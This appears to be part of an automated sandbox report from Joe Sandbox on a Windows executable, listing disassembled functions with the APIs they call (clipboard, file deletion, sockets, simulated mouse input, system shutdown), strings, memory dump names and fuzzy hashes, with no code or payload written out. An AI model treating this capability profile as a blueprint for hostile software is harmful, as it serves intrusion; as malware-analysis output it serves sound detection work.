                                                                                          • Instruction ID: 3e31e6e0fe65f254632394fa945575d23cefe14f4fae3f671aaf49b3ea62ffd6
                                                                                          • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                          • Instruction Fuzzy Hash: EF71B036A0DA86C5E720EF65E8546ED6760FB88B94F904132EE8D47B64EF3CD146C710
                                                                                          Function 00007FF74D0C0D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1737998785-0
                                                                                          • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                          • Instruction ID: 04648a4053e41510158cb6004015759842f1eff11ae08885170068ef73fcdaa5
                                                                                          • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                          • Instruction Fuzzy Hash: 05415D72A0CA82C2EB14FB55D598378B760FF88B85F858434DA8E07762EF7CE0558764
                                                                                          Function 00007FF74D0AB7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 4047182710-1173974218
                                                                                          • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                          • Instruction ID: 0a2dcc4c6f92c6da06bb64fef754cb848d633e98ec7398f9fa8e75ae8ee2b2c8
                                                                                          • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                          • Instruction Fuzzy Hash: A9814522A0CA42D5EB50FB65E4441FDAB60EB94794FC01132EACE47ABAEF7CD545C720
                                                                                          Function 00007FF74D072650 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                          • String ID: ?
                                                                                          • API String ID: 500310315-1684325040
                                                                                          • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                          • Instruction ID: a84165298cd81896b29140d8b5dcbefc3fefd00224dca271a768b52264ea81b1
                                                                                          • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                          • Instruction Fuzzy Hash: 65617D72A0C652C6E750FF21A9405B9B7A4FB88794FC41136EA8D4B6A5FF3CE441CB60
                                                                                          Function 00007FF74D0C3940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                          • String ID:
                                                                                          • API String ID: 540024437-0
                                                                                          • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                          • Instruction ID: 19089e277908ac9532d5e77119a9d3065d7b1259187e942f97631c9cf134b09b
                                                                                          • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                          • Instruction Fuzzy Hash: 0441AF61A0C692C6EB24FF16E45026DA760FF85FA0F844530DADE477A2EF7CD1558710
                                                                                          Function 00007FF74D0C8360 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                          • API String ID: 0-572801152
                                                                                          • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                          • Instruction ID: d4118f5f44b44ba9b18d2840e4cfffd23eed4e19fa53281d64c215c24c834882
                                                                                          • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                          • Instruction Fuzzy Hash: 97E1B436A0CB82D6EB24EF65D4402ADB7A0FB88B94F804136DE8D57BA4EF38D545C714
                                                                                          Function 00007FF74D0A8E18 Relevance: 10.6, APIs: 7, Instructions: 145windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                          • Instruction ID: e17ea84d40281631dd4c98b5207f7b5694b496e9bd006ccd14e1bd32d0fe0505
                                                                                          • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                          • Instruction Fuzzy Hash: EE518052A0C2D295F775B7716100BBDAFA1FB56BC4FC88074DAC907F56DA18E8648331
                                                                                          Function 00007FF74D0ABC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2649000838-1173974218
                                                                                          • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                          • Instruction ID: 2d5682fa403f583bd858f96a82ec697aa489235b8148695d01c81216b7f97eb9
                                                                                          • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                          • Instruction Fuzzy Hash: 0B416222A2CA42D2EA50FB24E5442EDE360FF94794FD01131EA9E476A5EFBCD545C720
                                                                                          Function 00007FF74D0C4C58 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                                          • String ID:
                                                                                          • API String ID: 383626216-0
                                                                                          • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                                          • Instruction ID: fb8dca2b4779023666bb672b5a4facd74ca78edfbf5b17ac44f710a158375d5d
                                                                                          • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                                          • Instruction Fuzzy Hash: E731B133B0C652CBE314EF61D4847AC77A1FB98748F800235EA4A53AA4EF38E549C750
                                                                                          Function 00007FF74D06AF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1239891234-0
                                                                                          • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                          • Instruction ID: 3b0e92dbfeba7d5263b7ea0bf35b1a94b108325b6e143f3b7bd80bc11aabb998
                                                                                          • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                          • Instruction Fuzzy Hash: C931613660CB81C6EB60EF65E8443AEB7A4FB88754F900536EA9D43B64EF38C5558B10
                                                                                          Function 00007FF74D0BA874 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118filesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1927845040-438819550
                                                                                          • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                          • Instruction ID: e485ae8224fb17f650b83d37a37f6d206faaec89e50818cd8575c369d19fbf32
                                                                                          • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                          • Instruction Fuzzy Hash: 9A51803260CA86D5EB10FB55E4542BDA360FB45798F900132DE9D037A5EFB8E949C720
                                                                                          Function 00007FF74D0C4074 Relevance: 7.6, APIs: 5, Instructions: 148networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 4170576061-0
                                                                                          • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                          • Instruction ID: a4b3d6e6938a4e190bdd372c8f7789fe306e8db7f817caf3342ff8ceb73e2d7f
                                                                                          • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                          • Instruction Fuzzy Hash: EA51E221B0C652C2DB04FB12A40866DAB90BB89FE0FC48531DEDE477A6EF7CD0008790
                                                                                          Function 00007FF74D0B6D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 948891078-24824748
                                                                                          • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                                          • Instruction ID: 4d23f05758d54d8047f415ac33c728d581aac9fced8eb20033cc4f680be36e51
                                                                                          • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                                          • Instruction Fuzzy Hash: BCD1A022B1CB46C2EB10FB65D4946ADA760FB84B88F805031EE8E47B75EE7CD505C760
                                                                                          Function 00007FF74D06793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _handle_error
                                                                                          • String ID: !$VUUU$fmod
                                                                                          • API String ID: 1757819995-2579133210
                                                                                          • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                          • Instruction ID: 6184c661b84503ede5e36bdf68066c7ec9cdcac5dce6ddaa9d7ae78202d6f359
                                                                                          • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                          • Instruction Fuzzy Hash: F6B1C821E1CFC585D6B39A3454513B6F259AFEA390F50D332E99E36E64EF2C95C28700
                                                                                          Function 00007FF74D072D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF74D072D60
                                                                                            • Part of subcall function 00007FF74D06B184: GetCurrentProcess.KERNEL32(00007FF74D06B21D), ref: 00007FF74D06B1B1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                          • String ID: *$.$.
                                                                                          • API String ID: 2518042432-2112782162
                                                                                          • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                                          • Instruction ID: 4b4e3d9d85cff7234870238c9c4d322de93fb96a1a8590353036c46099a19e0a
                                                                                          • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                                          • Instruction Fuzzy Hash: 0751C162F1DA55C5FB10FBB698001BDA7A4BB44BC8F944536CE8D1BB95EF38D4428320
                                                                                          Function 00007FF74D0AD750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 2163645468-3733053543
                                                                                          • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                          • Instruction ID: 08f488a80671ff0064aea501c07311643a1603d7c9252586e94982083de03688
                                                                                          • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                          • Instruction Fuzzy Hash: 45118F32B1C606C2E724FB25A44116EB262AF94750F894135E5DE83AB9FF6CD8068B60
                                                                                          Function 00007FF74D055BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF74D055C43
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                          • API String ID: 389471666-631824599
                                                                                          • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                          • Instruction ID: 8eb472fa4cb4946086e0a7a710a133cd2c8c6e204ce7d9ce2a1f97377deb44be
                                                                                          • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                          • Instruction Fuzzy Hash: 2B11FE31A1CB46D6E744BB21D65936973A4FB48345F804535CA8D43560FF7CE4648720
                                                                                          Function 00007FF74D036D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
